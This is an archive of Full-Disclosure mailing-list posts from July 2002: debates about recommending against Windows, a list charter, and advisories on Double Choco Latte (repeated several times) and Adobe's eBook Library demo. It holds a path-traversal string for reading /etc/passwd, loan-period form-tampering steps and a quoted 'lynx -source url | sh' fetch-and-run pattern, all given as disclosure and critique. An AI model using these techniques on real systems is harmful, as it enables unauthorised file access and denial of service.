http://spoor12.edup.tudelft.nl/SkyLined%20v4.2/?Advisories/Anonymous surfing, NOT! ) it would help relieve some of your ignorance. What he's reffering to is a getting script (usually javascript) through the filters and executing on the 'anonymous' person's machine. If a site can do that they can save cookies to the machine, thereby breaking the anonymity. It's not really cross site scripting, though the techniques used to get it through are similar. Right now 'cross site scripting' seems to be the buzz word attached to any security breach involving scripts. Something we have to live with I guess. Anyway, whatever it's called SkyLined seems to be the l33test at it ;) - Blazde _______________________________________________ Full-Disclosure - We believe in it. Full-Disclosure at lists.netsys.com http://lists.netsys.com/mailman/listinfo/full-disclosure From cmason at unixzone.com Sun Jul 14 16:56:47 2002 From: cmason at unixzone.com (Chris L. Mason) Date: Sun, 14 Jul 2002 11:56:47 -0400 Subject: [Full-Disclosure] Anonymous surfing my ass! In-Reply-To: <006301c22b4c$1e0afa60$6401a8c0@Laptop2> References: <004501c22b47$dc0e1ce0$0a00a8c0@violetclub> <006301c22b4c$1e0afa60$6401a8c0@Laptop2> Message-ID: <20020714155647.GA27147@unixzone.com> On Sun, Jul 14, 2002 at 09:35:39AM -0600, Steve wrote: ... > bother clicking on the link. And for those of us who happen to be > checking email on Windoze boxes, clicking on random Internet links > probably isn't the brightest thing to do from IE unless you have > bothered to disable all the various active scripting etc....... > Patient: Doctor, it hurts when I bang my head into the wall. What can I do? Doctor: Stop banging your head into the wall! Chris From johnc at grok.org.uk Sun Jul 14 19:01:42 2002 From: johnc at grok.org.uk (John Cartwright) Date: Sun, 14 Jul 2002 19:01:42 +0100 Subject: [Full-Disclosure] List Charter In-Reply-To: <20020712134833.GA547@www1.grok.org.uk> References: <20020712134833.GA547@www1.grok.org.uk> Message-ID: <20020714180142.GA4402@www1.grok.org.uk> On Fri, Jul 12, 2002 at 02:48:33PM +0100, John Cartwright wrote: > We're contemplating the creation of a list charter, and welcome > your ideas. Whether this occurs on- or off-list is entirely up > to you, the members. Hi A draft charter is now available at http://lists.netsys.com/full-disclosure-charter.html Comments? - John From core at bokeoa.com Sun Jul 14 19:25:27 2002 From: core at bokeoa.com (Charles 'core' Stevenson) Date: Sun, 14 Jul 2002 12:25:27 -0600 Subject: [Full-Disclosure] Anonymous surfing my ass! References: <006301c22b4c$1e0afa60$6401a8c0@Laptop2> Message-ID: <3D31C217.5070105@bokeoa.com> Hasty flames are counterproductive. Let us not be so quick to judge. Speaking from personal experience, I would imagine that most people's first few advisories are bound to lack clarity/details. Additionally one must remember not to hit that reply button instantly after reading a post that triggers anger/hostility. I myself am guilty of all the aforementioned shortcomings. But hey we're human aren't we? Nor should a man be in a hurry to publish his advisory the instant his proof-of-concept exploit works. Sitting on a bug for a little while will afford the time to polish the advisory and/or exploit. The discloser must determine the fundamental pieces of information every advisory should have and a format which puts the bottom-line-up-front. In this fashion the discloser can take pride in knowing, whether the bug was trivial to exploit or a work of art, that all of those who read it will walk away with a clear understanding of the problem, impact, solution, etc.. Take a look at security focus's vuln-help advisory template. peace, core Steve wrote: > You would think that the email sent to the list would have contained > more information. Based on the email sent, one would might not even > bother clicking on the link. And for those of us who happen to be > checking email on Windoze boxes, clicking on random Internet links > probably isn't the brightest thing to do from IE unless you have > bothered to disable all the various active scripting etc....... > > How seriously would you take an email that simply said "click here > www.clicktobeowned.com" > > >>I think if you at least clicked the advisory link ( > > http://spoor12.edup.tudelft.nl/SkyLined%20v4.2/?Advisories/Anonymous > surfing, NOT! ) it would help relieve some of your ignorance. What he's > reffering to is a getting script (usually javascript) through the > filters and executing on the 'anonymous' person's machine. If a site can > do that they can save cookies to the machine, thereby breaking the > anonymity. > > It's not really cross site scripting, though the techniques used to get > it through are similar. Right now 'cross site scripting' seems to be the > buzz word attached to any security breach involving scripts. Something > we have to live with I guess. Anyway, whatever it's called SkyLined > seems to be the l33test at it ;) > > - Blazde > > _______________________________________________ > Full-Disclosure - We believe in it. Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure > > > _______________________________________________ > Full-Disclosure - We believe in it. > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure > > From ulfh at update.uu.se Sun Jul 14 21:48:23 2002 From: ulfh at update.uu.se (Ulf Harnhammar) Date: Sun, 14 Jul 2002 22:48:23 +0200 (CEST) Subject: [Full-Disclosure] Double Choco Latte multiple vulnerabilities Message-ID: Double Choco Latte multiple vulnerabilities PROGRAM: Double Choco Latte VENDOR: Michael Dean GNU Enterprise HOMEPAGE: http://dcl.sourceforge.net/index.php VULNERABLE VERSIONS: 20020215, possibly others NOT VULNERABLE VERSIONS: 20020706 LOGIN REQUIRED: yes SEVERITY: high DESCRIPTION: "Double Choco Latte is a package that provides basic project management capabilities, time tracking on tasks, call tracking, email notifications, online documents, statistical reports, a report engine, and more features are either working or being developed/planned. It is licensed under the GPL (GNU Public License), which means it is free to study, distribute, modify, and use." (direct quote from the program's homepage) SECURITY HOLES: 1) Both in Projects: Upload File Attachment and in Work Orders: Import, the program allows file uploads to occur, without checking if the four global variables with information about an upload (foo, foo_name, foo_size and foo_type) really were set by uploading a file or if they were normal POST data. This means that the upload functions can be fooled into treating any file that the web server can read (like /etc/passwd) as if it is the uploaded file. You fix this by using PHP's is_uploaded_file() function, which checks if a real upload has taken place. 2) When downloading files in Projects: Attachments, Double Choco Latte doesn't check if the path contains any ".." strings. This makes it possible for an attacker to download any file that the web server can read. He or she can download /etc/passwd by asking for "../../../../../../../etc/passwd". 3) Double Choco Latte has got lots of XSS (Cross-Site Scripting) issues, as the program displays user-supplied data without removing HTML tags. This occurs in Ticket# Find, Priorities, Severities, Projects, WO# Find, Departments and Users. You fix this with the htmlspecialchars() function. COMMUNICATION WITH VENDOR: The vendor was contacted on the 26th and 30th of May, and on the 26th of June. They released version 20020706, which does not have any of these security holes, on the 5th of July. RECOMMENDATION: I recommend that all administrators upgrade to version 20020706. // Ulf Harnhammar ulfh at update.uu.se From nick at virus-l.demon.co.uk Sun Jul 14 22:35:22 2002 From: nick at virus-l.demon.co.uk (Nick FitzGerald) Date: Mon, 15 Jul 2002 09:35:22 +1200 Subject: [Full-Disclosure] Anonymous surfing my ass! In-Reply-To: <20020714155647.GA27147@unixzone.com> References: <006301c22b4c$1e0afa60$6401a8c0@Laptop2> Message-ID: <0GZ900AHODB1Y7@smtp2.clear.net.nz> Chris replied to Steve: > On Sun, Jul 14, 2002 at 09:35:39AM -0600, Steve wrote: > ... > > bother clicking on the link. And for those of us who happen to be > > checking email on Windoze boxes, clicking on random Internet links > > probably isn't the brightest thing to do from IE unless you have > > bothered to disable all the various active scripting etc....... > > Patient: Doctor, it hurts when I bang my head into the wall. What can I do? > Doctor: Stop banging your head into the wall! Yes, yes but for many -- and for better or worse, though there's no prize for guessing which I think it is -- not using Windows (and even such stupidities as not using Outlook, or worse not using Notes) is not an option without breaking local "security" policies. As the people who are likely to directly benefit most (at all?) from lists such as this are the people who have to be seen to be most committed to enforcing security policies (even if they are grievously stupid policies), throwing out a blanket "don't use Windows" or "don't use " is not a constructive response. Suggesting sidestepping or subverting the local security policy (I'm not saying Chris was -- it could be inferred from his comment, but that would be a stretch) is grossly unprofessional (unless the suggester is not a security professional, in which case it is just common stupidity). Regards, Nick FitzGerald From dfs at roaringpenguin.com Sun Jul 14 22:58:59 2002 From: dfs at roaringpenguin.com (David F. Skoll) Date: Sun, 14 Jul 2002 17:58:59 -0400 (EDT) Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymous surfing my ass!) In-Reply-To: <0GZ900AHODB1Y7@smtp2.clear.net.nz> Message-ID: On Mon, 15 Jul 2002, Nick FitzGerald wrote: > throwing out a blanket "don't use Windows" or "don't use > " is not a constructive response. I disagree. I consider myself a security professional, and I tell all of my clients not to use Microsoft Outlook. I would consider it a dereliction of duty _not_ to tell them that. I also tell them they should switch away from Windows to Linux or some other free UNIX, and again, I think it's my duty to tell them that. They are free to take my advice or not, but they understand that if they do not take my advice with regards to Outlook, I am absolved of responsibility for any e-mail borne malware. I think it's important for security professionals to tell people not to use Windows, if only to open their eyes to the risk they put themselves at, and also to the fact that there are alternatives out there. Regards, David. From nick at virus-l.demon.co.uk Sun Jul 14 23:19:30 2002 From: nick at virus-l.demon.co.uk (Nick FitzGerald) Date: Mon, 15 Jul 2002 10:19:30 +1200 Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Ano In-Reply-To: References: <0GZ900AHODB1Y7@smtp2.clear.net.nz> Message-ID: <0GZ9002ZKFCKBP@smtp1.clear.net.nz> "David F. Skoll" wrote: > > throwing out a blanket "don't use Windows" or "don't use > > " is not a constructive response. > > I disagree. I consider myself a security professional, and I tell all > of my clients not to use Microsoft Outlook. I would consider it a > dereliction of duty _not_ to tell them that. I also tell them they > should switch away from Windows to Linux or some other free UNIX, and > again, I think it's my duty to tell them that. > > They are free to take my advice or not, but they understand that if > they do not take my advice with regards to Outlook, I am absolved of > responsibility for any e-mail borne malware. > > I think it's important for security professionals to tell people not > to use Windows, if only to open their eyes to the risk they put > themselves at, and also to the fact that there are alternatives out > there. I agree with all of the above. My point was, on lists like this, if someone is using Windows or some especially distasteful Windows network client software they are most likely doing so either because, as in my case, they have chosen to after weighing the various pros and cons of that decision or because "they have to" (being under one of those aforementioned "stupid" policy restrictions that requires all desktops to conform to a limited sense of "corporate normality"). Telling such people to drop their carefully chosen or enforced environment means you are more likely to be ignored as being "out of touch" or some such. That does not mean it is necessarily a waste of breath to advise a paying customer, but doing it among a group of security aware professional peers is likely to make one look bigoted and thus more likely to get you ignored. My comment about unprofessionalism was limited to a specific setting. Suggesting a "spot fix" that a nanosecond's consideration shows is likely to be policy violating in many corporate IT environments will have one branded "unthinking" at best and quite likely "unprofessional". Making the same suggestion when asked for professional advice is not unprofessional (at least, so long as the rest of the "structural chenges" such as altering local security policies to accomodate the suggested changes, etc are also covered in that advice). Regards, Nick FitzGerald From ulfh at update.uu.se Sun Jul 14 21:48:23 2002 From: ulfh at update.uu.se (Ulf Harnhammar) Date: Sun, 14 Jul 2002 22:48:23 +0200 (CEST) Subject: [Full-Disclosure] Double Choco Latte multiple vulnerabilities Message-ID: Double Choco Latte multiple vulnerabilities PROGRAM: Double Choco Latte VENDOR: Michael Dean GNU Enterprise HOMEPAGE: http://dcl.sourceforge.net/index.php VULNERABLE VERSIONS: 20020215, possibly others NOT VULNERABLE VERSIONS: 20020706 LOGIN REQUIRED: yes SEVERITY: high DESCRIPTION: "Double Choco Latte is a package that provides basic project management capabilities, time tracking on tasks, call tracking, email notifications, online documents, statistical reports, a report engine, and more features are either working or being developed/planned. It is licensed under the GPL (GNU Public License), which means it is free to study, distribute, modify, and use." (direct quote from the program's homepage) SECURITY HOLES: 1) Both in Projects: Upload File Attachment and in Work Orders: Import, the program allows file uploads to occur, without checking if the four global variables with information about an upload (foo, foo_name, foo_size and foo_type) really were set by uploading a file or if they were normal POST data. This means that the upload functions can be fooled into treating any file that the web server can read (like /etc/passwd) as if it is the uploaded file. You fix this by using PHP's is_uploaded_file() function, which checks if a real upload has taken place. 2) When downloading files in Projects: Attachments, Double Choco Latte doesn't check if the path contains any ".." strings. This makes it possible for an attacker to download any file that the web server can read. He or she can download /etc/passwd by asking for "../../../../../../../etc/passwd". 3) Double Choco Latte has got lots of XSS (Cross-Site Scripting) issues, as the program displays user-supplied data without removing HTML tags. This occurs in Ticket# Find, Priorities, Severities, Projects, WO# Find, Departments and Users. You fix this with the htmlspecialchars() function. COMMUNICATION WITH VENDOR: The vendor was contacted on the 26th and 30th of May, and on the 26th of June. They released version 20020706, which does not have any of these security holes, on the 5th of July. RECOMMENDATION: I recommend that all administrators upgrade to version 20020706. // Ulf Harnhammar ulfh at update.uu.se From ulfh at update.uu.se Sun Jul 14 21:48:23 2002 From: ulfh at update.uu.se (Ulf Harnhammar) Date: Sun, 14 Jul 2002 22:48:23 +0200 Subject: [Full-Disclosure] Double Choco Latte multiple vulnerabilities Message-ID: Double Choco Latte multiple vulnerabilities PROGRAM: Double Choco Latte VENDOR: Michael Dean GNU Enterprise HOMEPAGE: http://dcl.sourceforge.net/index.php VULNERABLE VERSIONS: 20020215, possibly others NOT VULNERABLE VERSIONS: 20020706 LOGIN REQUIRED: yes SEVERITY: high DESCRIPTION: "Double Choco Latte is a package that provides basic project management capabilities, time tracking on tasks, call tracking, email notifications, online documents, statistical reports, a report engine, and more features are either working or being developed/planned. It is licensed under the GPL (GNU Public License), which means it is free to study, distribute, modify, and use." (direct quote from the program's homepage) SECURITY HOLES: 1) Both in Projects: Upload File Attachment and in Work Orders: Import, the program allows file uploads to occur, without checking if the four global variables with information about an upload (foo, foo_name, foo_size and foo_type) really were set by uploading a file or if they were normal POST data. This means that the upload functions can be fooled into treating any file that the web server can read (like /etc/passwd) as if it is the uploaded file. You fix this by using PHP's is_uploaded_file() function, which checks if a real upload has taken place. 2) When downloading files in Projects: Attachments, Double Choco Latte doesn't check if the path contains any ".." strings. This makes it possible for an attacker to download any file that the web server can read. He or she can download /etc/passwd by asking for "../../../../../../../etc/passwd". 3) Double Choco Latte has got lots of XSS (Cross-Site Scripting) issues, as the program displays user-supplied data without removing HTML tags. This occurs in Ticket# Find, Priorities, Severities, Projects, WO# Find, Departments and Users. You fix this with the htmlspecialchars() function. COMMUNICATION WITH VENDOR: The vendor was contacted on the 26th and 30th of May, and on the 26th of June. They released version 20020706, which does not have any of these security holes, on the 5th of July. RECOMMENDATION: I recommend that all administrators upgrade to version 20020706. // Ulf Harnhammar ulfh at update.uu.se From dufresne at winternet.com Mon Jul 15 01:11:23 2002 From: dufresne at winternet.com (Ron DuFresne) Date: Sun, 14 Jul 2002 19:11:23 -0500 (CDT) Subject: [Full-Disclosure] Anonymous surfing my ass! In-Reply-To: <0GZ900AHODB1Y7@smtp2.clear.net.nz> Message-ID: On Mon, 15 Jul 2002, Nick FitzGerald wrote: [SNIP] > > Yes, yes but for many -- and for better or worse, though there's no > prize for guessing which I think it is -- not using Windows (and > even such stupidities as not using Outlook, or worse not using Notes) > is not an option without breaking local "security" policies. As the > people who are likely to directly benefit most (at all?) from lists > such as this are the people who have to be seen to be most committed > to enforcing security policies (even if they are grievously stupid > policies), throwing out a blanket "don't use Windows" or "don't use > " is not a constructive response. > > Suggesting sidestepping or subverting the local security policy (I'm > not saying Chris was -- it could be inferred from his comment, but > that would be a stretch) is grossly unprofessional (unless the > suggester is not a security professional, in which case it is just > common stupidity). > And yet, for those on the corp backbone stuck using broken software, and unable to login to a system not-so-broked on the inside, perhaps reading the lists from a hotmail or other account is a better option. Or perhaps setting up a openbsd or linux system less prone to these exploits circulating at home might be a better way t avoid some of the hassels with borked systems on their desktops. It all depends I guess upon how much effort they wish in invest into their chosen field of employment/enjoyment. Thanks, Ron DuFresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From dufresne at winternet.com Mon Jul 15 01:23:02 2002 From: dufresne at winternet.com (Ron DuFresne) Date: Sun, 14 Jul 2002 19:23:02 -0500 (CDT) Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Ano In-Reply-To: <0GZ9002ZKFCKBP@smtp1.clear.net.nz> Message-ID: On Mon, 15 Jul 2002, Nick FitzGerald wrote: [SNIP] > Telling such people to drop > their carefully chosen or enforced environment means you are more > likely to be ignored as being "out of touch" or some such. > > That does not mean it is necessarily a waste of breath to advise a > paying customer, but doing it among a group of security aware > professional peers is likely to make one look bigoted and thus more > likely to get you ignored. > [SNIP] Hmmmm, Does it not make those that do not wish to listen the fewls, being there have been warnings and issues with the tools on their desktops and at their fingertips since some of these lists began and prior. Issues that are "fixed and patched" again and again, and the same warnings have been issued about actieX and java within those tools for how long now? Again, if folks have to play in insecure settings on the corp backbone, then perhaps they need to find alternative ways to play in some of these lists. I can't count the times that windows users on the vuln-dev list have been infected with exploit code published there, and then whined about it! Even after warnings by BB that it was what the list was for. People need to take some of the responsibility for their own security upon themselves, IRL and online... Thanks, Ron DuFresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From pauls at utdallas.edu Mon Jul 15 04:24:51 2002 From: pauls at utdallas.edu (Paul Schmehl) Date: Sun, 14 Jul 2002 22:24:51 -0500 (CDT) Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymous surfing my ass\!) Message-ID: <20020715032451.06AF19B3F@pc11027.utdallas.edu> Do you then wash your hands of that client? Or do you purport to provide them with security expertise without helping them secure their network, simply because you're opposed to the use of MS products? Companies make stupid decisions all the time. It's the job of security professionals to find a way to make that nework _as_secure_as_possible_ regardless of the applications they have chosen to use. IOW, after you've gotten off your evangelist's pulpit and come down into the real world, do you simply walk away from clients that refuse to take your advice? Or do you help them secure their network _despite_ their poor choices? Paul Schmehl pauls at utdallas.edu Supervisor, Support Services University of Texas at Dallas AVIEN Founding Member ----- Original Message ----- From: "David F. Skoll" To: Sent: Sunday, July 14, 2002 4:58 PM Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymous surfing my ass!) > > I think it's important for security professionals to tell people not > to use Windows, if only to open their eyes to the risk they put > themselves at, and also to the fact that there are alternatives out > there. From hellnbak at nmrc.org Mon Jul 15 05:44:35 2002 From: hellnbak at nmrc.org (hellNbak) Date: Mon, 15 Jul 2002 00:44:35 -0400 (EDT) Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymous surfing my ass\!) In-Reply-To: <20020715032451.06AF19B3F@pc11027.utdallas.edu> Message-ID: I think I just saw a pig fly, hell freeze over etc... I actually agree with Paul Schmehl on something other than Russ Cooper is a sexy beast (not). Mindless "dont use windows reccomendations" are just that, mindless. If you poorly manage the security of Windows networks what makes you think that you will manage the security of *nix networks any better? I do Pen-Tests for a living -- there are just as many ways to own a *nix box as there are a windows box. Do you expect that the mindless user base is going to be able to figure out Linux (even with X) when they can barely run their MS based machines? So many of my clients would fire you on the spot for reccomending that they just stop running MS products. If you truly are a security professional -- you would know better. NOTE: I am not saying that MS products are superior in any way - for those that know what they are doing - yeah run your favourite *nix. On Sun, 14 Jul 2002, Paul Schmehl wrote: > Date: Sun, 14 Jul 2002 22:24:51 -0500 (CDT) > From: Paul Schmehl > Reply-To: full-disclosure at lists.netsys.com > To: full-disclosure at lists.netsys.com > Subject: Re: [Full-Disclosure] Counseling not to use Windows (was Re: > Anonymous surfing my ass\!) > > Do you then wash your hands of that client? Or do you purport to provide them with security expertise without helping them secure their network, simply because you're opposed to the use of MS products? Companies make stupid decisions all the time. It's the job of security professionals to find a way to make that nework _as_secure_as_possible_ regardless of the applications they have chosen to use. > > IOW, after you've gotten off your evangelist's pulpit and come down into the real world, do you simply walk away from clients that refuse to take your advice? Or do you help them secure their network _despite_ their poor choices? > > Paul Schmehl pauls at utdallas.edu > Supervisor, Support Services > University of Texas at Dallas > AVIEN Founding Member > > ----- Original Message ----- > From: "David F. Skoll" > To: > Sent: Sunday, July 14, 2002 4:58 PM > Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymous surfing my ass!) > > > > I think it's important for security professionals to tell people not > > to use Windows, if only to open their eyes to the risk they put > > themselves at, and also to the fact that there are alternatives out > > there. > _______________________________________________ > Full-Disclosure - We believe in it. > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure > -- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- "I don't intend to offend, I offend with my intent" hellNbak at nmrc.org http://www.nmrc.org/~hellnbak -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- From vkatalov at elcomsoft.com Mon Jul 15 10:13:31 2002 From: vkatalov at elcomsoft.com (Vladimir Katalov) Date: Mon, 15 Jul 2002 13:13:31 +0400 Subject: [Full-Disclosure] Vulnerability found: The Adobe eBook Library Message-ID: <217445447.20020715131331@elcomsoft.com> Adobe Systems Incorporated (http://www.adobe.com) recently opened a special web site to demonstrate the new library features of Adobe Content Server 3.0 (http://www.adobe.com/products/contentserver). According to Adobe description, "The Adobe eBook Library uses Adobe Content Server as a secure repository for the eBooks". The library is located at: http://librarydemo.adobe.com/library/ There are a few books available -- 5 copies of each. The customer can borrow any book for a fixed period of time (one or three days); when one customer gets a book, the counter ("number of books available") is decreased, and when it reaches zero, this book becomes not available until at least one other customer will return it to the library, or loan period will expire. However, there are three bugs/vulnerabilities there: 1. It is possible to get all available copies of any book -- Adobe Acrobat eBook Reader doesn't check if you have borrowed the given book already. 2. The loan period (one or three days) is not verified. It is implemented in the script using the following
Borrow for 1 day
Borrow for 3 days
... The value of loanMin is the loan period in minutes (1440 for one day, and 4320 for three days). It is possible to save the form to the local disk, change one of the values to the one you need (i.e. 525600 for one year), load the updated form into the browser, and by pressing the "Add to bookbag" button borrow this book for the selected ("fake") period. Note: it is also needed to change (in the local copy of the form) "download.asp" to the following: http://librarydemo.adobe.com/library/download.asp Otherwise, the local form will not work. 3. When the book counter reaches zero, the user can see a note near the book description: There are currently none available. Please check back later. However, the "Add to bookbag" button is still available and working just fine, i.e. it is still possible to get another copy (copies) of the book. And the "Number of Books" counter (on the library page) becomes negative. By combining bugs [1] and [2], it is very easy to implement something like "Denial-of-service" attack for the library: just get all copies of all books from the library (for very large period of time -- e.g. a few years). So no books will be available to anybody else. Besides, there is ability to borrow the books for unlimited time. -- Sincerely yours, Vladimir Vladimir Katalov Managing Director ElcomSoft Co.Ltd. Member of Association of Shareware Professionals (ASP) Member of Russian Cryptology Association mailto:vkatalov at elcomsoft.com http://www.elcomsoft.com/adc.html (Advanced Disk Catalog) http://www.elcomsoft.com/art.html (Advanced Registry Tracer) http://www.elcomsoft.com/prs.html (Password Recovery Software) From bolo at lupa.de Mon Jul 15 10:18:23 2002 From: bolo at lupa.de (Boris Lorenz) Date: Mon, 15 Jul 2002 11:18:23 +0200 Subject: [Full-Disclosure] List Charter References: <382BC0C28F397F4785E7414B8279F5271B530E@n2-atl-exch.it.n2bb.com> Message-ID: <3D32935F.5BE0E58A@lupa.de> Yup, Alan Rouse wrote: > > My interest is in the earliest possible warning of what the bad guys are > currently trying to do to systems like mine. I don't care who it comes > from, or whether it is presented in a businesslike manner, as long as it > contains useful information. I'm interested in proof of concept code, > actual exploit code, artifacts from actual attacks, theoretical > vulnerabilities discovered by code reviews, defensive tactics, links to > ongoing discussions, educational q & a, or anything else that might make > me aware of potential mayhem and how to prepare for it. > > I'm not interested in flame wars or philosophical arguments. They don't > help me do my job. Spot on, Alan. bugtraq bashing and chit-chat about The Right Thing to do can be refreshing at times, but that's not what my customers want whose networks I have to protect. And that's not what I rate as useful information. I think we will have to wait another week or so till the dust has settled a bit, and the new list shows in which direction it will go; if the current flood of futile discussions keeps its tide, I will prolly sign off. Boris Lorenz * Security Admin *nix - *nux * --- From dfs at roaringpenguin.com Mon Jul 15 12:35:06 2002 From: dfs at roaringpenguin.com (David F. Skoll) Date: Mon, 15 Jul 2002 07:35:06 -0400 (EDT) Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymous surfing my ass\!) In-Reply-To: <20020715032451.06AF19B3F@pc11027.utdallas.edu> Message-ID: On Sun, 14 Jul 2002, Paul Schmehl wrote: > Do you then wash your hands of that client? It depends. I state up front that I do not support Windows, period. If they want me to install and configure Linux boxes as file servers or mail servers, I work for them. If they want me to do Windows work, I decline. > IOW, after you've gotten off your evangelist's pulpit and come down > into the real world, do you simply walk away from clients that refuse > to take your advice? Again, it depends on the situation. Sometimes, yes. If clients go completely against my advice, they're not worth having. It will blow up in my face later. -- David. From dfs at roaringpenguin.com Mon Jul 15 12:38:30 2002 From: dfs at roaringpenguin.com (David F. Skoll) Date: Mon, 15 Jul 2002 07:38:30 -0400 (EDT) Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymous surfing my ass\!) In-Reply-To: Message-ID: On Mon, 15 Jul 2002, hellNbak wrote: > So many of my clients would fire you on the spot for reccomending that > they just stop running MS products. Fine; that's their choice. > If you truly are a security > professional -- you would know better. I think this is a very bad attitude. Trying to secure Windows on the desktop is fundamentally impossible because of design flaws. Sure, UNIX boxes can be owned, no question about it. They can be owned because of bugs such as buffer overflows, tempfile races, etc. which are implementation problems. Windows boxes are fundamentally insecure because of bad design, not only because of programming errors. Encoding metadata such as "executableness" in a filename, for example, is a fundamental design flaw, and one that's impossible to correct without changing Windows' design. So no, I don't refuse to deal with clients who use Outlook. But yes, I recommend they switch anyway, because to do less is an abdication of my responsibility. -- David. From cmason at unixzone.com Mon Jul 15 14:32:45 2002 From: cmason at unixzone.com (Chris L. Mason) Date: Mon, 15 Jul 2002 09:32:45 -0400 Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Ano In-Reply-To: <0GZ9002ZKFCKBP@smtp1.clear.net.nz> References: <0GZ900AHODB1Y7@smtp2.clear.net.nz> <0GZ9002ZKFCKBP@smtp1.clear.net.nz> Message-ID: <20020715133245.GA19805@unixzone.com> On Mon, Jul 15, 2002 at 10:19:30AM +1200, Nick FitzGerald wrote: ... > > I agree with all of the above. > > My point was, on lists like this, if someone is using Windows or some > especially distasteful Windows network client software they are most > likely doing so either because, as in my case, they have chosen to > after weighing the various pros and cons of that decision or because > "they have to" (being under one of those aforementioned "stupid" > policy restrictions that requires all desktops to conform to a > limited sense of "corporate normality"). Telling such people to drop > their carefully chosen or enforced environment means you are more > likely to be ignored as being "out of touch" or some such. ... > > My comment about unprofessionalism was limited to a specific setting. > Suggesting a "spot fix" that a nanosecond's consideration shows is > likely to be policy violating in many corporate IT environments will > have one branded "unthinking" at best and quite likely > "unprofessional". Making the same suggestion when asked for > professional advice is not unprofessional (at least, so long as the > rest of the "structural chenges" such as altering local security > policies to accomodate the suggested changes, etc are also covered in > that advice). > Well, that's what I get for making such a short comment. :) Anyway, let me try to be more clear. The many holes in clients such as Internet Explorer and Outlook have been made clear over and over again for many years now. The insecurity of these products is not news. Companies who were dependant on these programs, or who had policies referring to them, have had years now to plan a migration away from them to other tools, and to write new policies. There should never have been any need for a "spot fix." However, there's no point in saying "I told you so" either. So, while it's unfortunate that these products are still so widely used, it not too late. Companies can still make the necessary decisions and more forward to ensure a more secure and productive environment. My post was intended as a simple reminder that even if you've been banging your head against the wall for years, it's never too late to stop. :) Chris From dfs at roaringpenguin.com Mon Jul 15 15:32:58 2002 From: dfs at roaringpenguin.com (David F. Skoll) Date: Mon, 15 Jul 2002 10:32:58 -0400 (EDT) Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Ano In-Reply-To: <20020715133245.GA19805@unixzone.com> Message-ID: On Mon, 15 Jul 2002, Chris L. Mason wrote: > However, there's no point in saying "I told you so" either. So, while > it's unfortunate that these products are still so widely used, it not too > late. Companies can still make the necessary decisions and more forward > to ensure a more secure and productive environment. Amen. > My post was intended as a simple reminder that even if you've been banging > your head against the wall for years, it's never too late to stop. :) Right. And that is why I think security professionals *must* advise clients to make long-term plans to wean themselves from proven-insecure products. While security is a process, not a product, the flip side is that insecurity can indeed result from a specific product. The use of insecure products can upset even the most careful security process. So, security professionals who don't mind getting dirty should, by all means, help their clients patch up their Windows networks. (I happen to mind getting dirty, so I decline that work.) But all security professionals should help their clients maintain perspective, and realize that fighting with Windows is not a long-term viable solution. (And those same professionals, by the way, should be critical of developments in the Linux world like GNOME's installer: "lynx -source url | sh". This is just as bad as the worst Windows design.) -- David. From csnow at deltadentalwa.com Mon Jul 15 18:13:37 2002 From: csnow at deltadentalwa.com (Snow, Corey) Date: Mon, 15 Jul 2002 10:13:37 -0700 Subject: [Full-Disclosure] List Charter Message-ID: at 02:48:33PM +0100, John Cartwright wrote: > > > We're contemplating the creation of a list charter, and welcome > > your ideas. Whether this occurs on- or off-list is entirely up > > to you, the members. > > Hi > > A draft charter is now available at > http://lists.netsys.com/full-disclosure-charter.html > > Comments? > Something to add to the "Acceptable Content" section- it should be stipulated that actual exploits (i.e., posting a worm in working format hoping to hurt those evil Outlook users) or other directly malicious (malicious to list readers, that is) is verboten. In other words, exploit code and such is fine, as long as it's not active when you read the message. Anyone who got hit with something like that arguably might deserve it (I'd never argue such a position myself, because I don't think that being uneducated is a crime deserving of punishment), but the list should never be the vector of attack for anyone on it, successful or not. Corey Snow ######################################################### The information contained in this e-mail and subsequent attachments may be privileged, confidential and protected from disclosure. This transmission is intended for the sole use of the individual and entity to whom it is addressed. If you are not the intended recipient, any dissemination, distribution or copying is strictly prohibited. If you think that you have received this message in error, please e-mail the sender at the above e-mail address. ######################################################### From markjw at lightlink.com Mon Jul 15 22:50:12 2002 From: markjw at lightlink.com (Mark J. Walborn) Date: Mon, 15 Jul 2002 17:50:12 -0400 Subject: [Full-Disclosure] w32.frethem.k@mm and good reading References: Message-ID: <03c201c22c49$994e3770$1031020a@home.barrington.com> Has anyone encountered the above mentioned worm? Several anti-viral software companies have posted updates as of midnight.. Also, I found the following article of interest. By Robin Miller, NewsForge.com > Posted: 06/06/2002 at 12:10 GMT > [724.gif] Here's an interesting way to secure an Internet-connected > computer against intruders: Make sure the operating system and > software it runs are so old that current hacking tools won't work on > it. This was suggested by Brian Aker, one of the programmers who works > on Linux.com, NewsForge, Slashdot, and other OSDN sites; he runs > several servers of his own that host a number of small non-profit > sites in the Seattle area. "I have one box still running a version of > Solaris that's so old none of the script kiddies can figure it out," > Brian says. "They tend to focus on the latest and greatest, and don't > have the slightest idea how to handle my old Sun box." > Brian points out that 